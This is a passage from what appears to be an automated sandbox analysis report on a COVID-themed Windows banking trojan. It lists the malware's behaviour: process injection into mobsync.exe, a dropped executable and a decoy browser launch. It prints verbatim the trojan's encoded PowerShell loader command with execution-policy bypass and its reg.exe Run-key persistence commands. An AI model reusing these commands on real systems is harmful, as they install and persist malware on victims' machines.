sAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A Jump to behavior

System Summary:

barindex
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\buyonegetone.exe Jump to dropped file
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68604761C NtQueueApcThread, 13_2_00007FF68604761C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF6860473EC NtResumeThread, 13_2_00007FF6860473EC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686047494 NtAllocateVirtualMemory, 13_2_00007FF686047494
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686047478 NtWriteVirtualMemory, 13_2_00007FF686047478
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE10761C NtQueueApcThread, 18_2_00007FF6FE10761C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE1073EC NtResumeThread, 18_2_00007FF6FE1073EC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE107494 NtAllocateVirtualMemory, 18_2_00007FF6FE107494
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE107478 NtWriteVirtualMemory, 18_2_00007FF6FE107478
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D67478 NtWriteVirtualMemory, 29_2_00007FF7E3D67478
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D67494 NtAllocateVirtualMemory, 29_2_00007FF7E3D67494
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D673EC NtResumeThread, 29_2_00007FF7E3D673EC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D6761C NtQueueApcThread, 29_2_00007FF7E3D6761C
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFAEEB110AB 1_2_00007FFAEEB110AB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFAEEB10FC2 1_2_00007FFAEEB10FC2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFAEEBE28D1 1_2_00007FFAEEBE28D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFAEEBE6DE8 1_2_00007FFAEEBE6DE8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605CFAC 13_2_00007FF68605CFAC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686057019 13_2_00007FF686057019
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605110C 13_2_00007FF68605110C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686052934 13_2_00007FF686052934
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF6860665A8 13_2_00007FF6860665A8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF6860415B0 13_2_00007FF6860415B0
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF6860655F4 13_2_00007FF6860655F4
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605FE08 13_2_00007FF68605FE08
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF6860536B4 13_2_00007FF6860536B4
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686055ED8 13_2_00007FF686055ED8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605C71C 13_2_00007FF68605C71C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686062B4C 13_2_00007FF686062B4C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605BC00 13_2_00007FF68605BC00
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686043C20 13_2_00007FF686043C20
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF6860614EC 13_2_00007FF6860614EC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686041140 13_2_00007FF686041140
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605D1B8 13_2_00007FF68605D1B8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605B1F4 13_2_00007FF68605B1F4
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686056284 13_2_00007FF686056284
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686056AA0 13_2_00007FF686056AA0
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE115ED8 18_2_00007FF6FE115ED8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE11CFAC 18_2_00007FF6FE11CFAC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE117019 18_2_00007FF6FE117019
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE112934 18_2_00007FF6FE112934
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE11110C 18_2_00007FF6FE11110C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE1265A8 18_2_00007FF6FE1265A8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE1015B0 18_2_00007FF6FE1015B0
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE1255F4 18_2_00007FF6FE1255F4
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE11FE08 18_2_00007FF6FE11FE08
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE1136B4 18_2_00007FF6FE1136B4
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE11C71C 18_2_00007FF6FE11C71C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE122B4C 18_2_00007FF6FE122B4C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE11BC00 18_2_00007FF6FE11BC00
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE103C20 18_2_00007FF6FE103C20
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE1214EC 18_2_00007FF6FE1214EC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE101140 18_2_00007FF6FE101140
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE11B1F4 18_2_00007FF6FE11B1F4
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE11D1B8 18_2_00007FF6FE11D1B8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE116AA0 18_2_00007FF6FE116AA0
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE116284 18_2_00007FF6FE116284
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D75ED8 29_2_00007FF7E3D75ED8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D814EC 29_2_00007FF7E3D814EC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D63C20 29_2_00007FF7E3D63C20
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D7BC00 29_2_00007FF7E3D7BC00
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D82B4C 29_2_00007FF7E3D82B4C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D76AA0 29_2_00007FF7E3D76AA0
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D76284 29_2_00007FF7E3D76284
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D7B1F4 29_2_00007FF7E3D7B1F4
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D7D1B8 29_2_00007FF7E3D7D1B8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D61140 29_2_00007FF7E3D61140
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D72934 29_2_00007FF7E3D72934
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D7110C 29_2_00007FF7E3D7110C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D77019 29_2_00007FF7E3D77019
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D7CFAC 29_2_00007FF7E3D7CFAC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D7C71C 29_2_00007FF7E3D7C71C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D736B4 29_2_00007FF7E3D736B4
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D7FE08 29_2_00007FF7E3D7FE08
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D855F4 29_2_00007FF7E3D855F4
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D865A8 29_2_00007FF7E3D865A8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D615B0 29_2_00007FF7E3D615B0
One or more processes crash
Source: C:\Windows\System32\mobsync.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6888 -s 640
PE / OLE file has an invalid certificate
Source: covid.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: covid.exe Binary or memory string: OriginalFilename vs covid.exe
Source: covid.exe, 00000000.00000002.302616410.0000000000C72000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamedocview.exe4 vs covid.exe
Source: covid.exe, 00000000.00000002.304388463.0000000003200000.00000002.00000001.sdmp Binary or memory string: originalfilename vs covid.exe
Source: covid.exe, 00000000.00000002.304388463.0000000003200000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs covid.exe
Source: covid.exe, 00000000.00000002.304256413.00000000031A0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs covid.exe
Source: covid.exe, 00000000.00000002.303581212.000000000156A000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs covid.exe
Source: covid.exe Binary or memory string: OriginalFilenamedocview.exe4 vs covid.exe
Uses 32bit PE files
Source: covid.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses reg.exe to modify the Windows registry
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
Yara signature match
Source: 00000001.00000002.263748578.000001A410EF0000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt, type: DROPPED Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: classification engine Classification label: mal100.bank.troj.evad.winEXE@32/132@14/13
Source: C:\Users\user\Desktop\covid.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\covid.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:244:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5132:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_01
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6224
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5504
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6888
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnfqvlmt.og0.ps1 Jump to behavior
Source: covid.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\covid.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\covid.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\covid.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mobsync.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mobsync.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: covid.exe Virustotal: Detection: 15%
Source: covid.exe ReversingLabs: Detection: 34%
Source: unknown Process created: C:\Users\user\Desktop\covid.exe 'C:\Users\user\Desktop\covid.exe'
Source: C:\Users\user\Desktop\covid.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.who.int/
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4168 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Windows\System32\mobsync.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6888 -s 640
Source: unknown Process created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Windows\System32\mobsync.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6224 -s 636
Source: unknown Process created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Windows\System32\mobsync.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5504 -s 404
Source: unknown Process created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\user\Desktop\covid.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.who.int/ Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe' Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4168 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\user\Desktop\covid.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: covid.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: covid.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: covid.exe Static file information: File size 5253560 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: covid.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4ff600
Source: covid.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

barindex
Yara detected Powershell Load Encrypted Assembly
Source: Yara match File source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt, type: DROPPED
PE file contains sections with non-standard names
Source: buyonegetone.exe.1.dr Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFAEEB176DB push ebx; retf 1_2_00007FFAEEB1771A
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF6860870E8 push rcx; ret 13_2_00007FF6860870E9
Source: C:\Windows\System32\mobsync.exe Code function: 15_2_0000023A00BA01C9 push esp; iretd 15_2_0000023A00BA01F8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE1470E8 push rcx; ret 18_2_00007FF6FE1470E9
Source: C:\Windows\System32\mobsync.exe Code function: 20_2_0000023F814901EC push esp; iretd 20_2_0000023F814901F8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3DA70E8 push rcx; ret 29_2_00007FF7E3DA70E9

Persistence and Installation Behavior:

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe Jump to behavior
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\buyonegetone.exe Jump to dropped file
Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PromoJohn
Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PromoJohn
Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PromoJohn
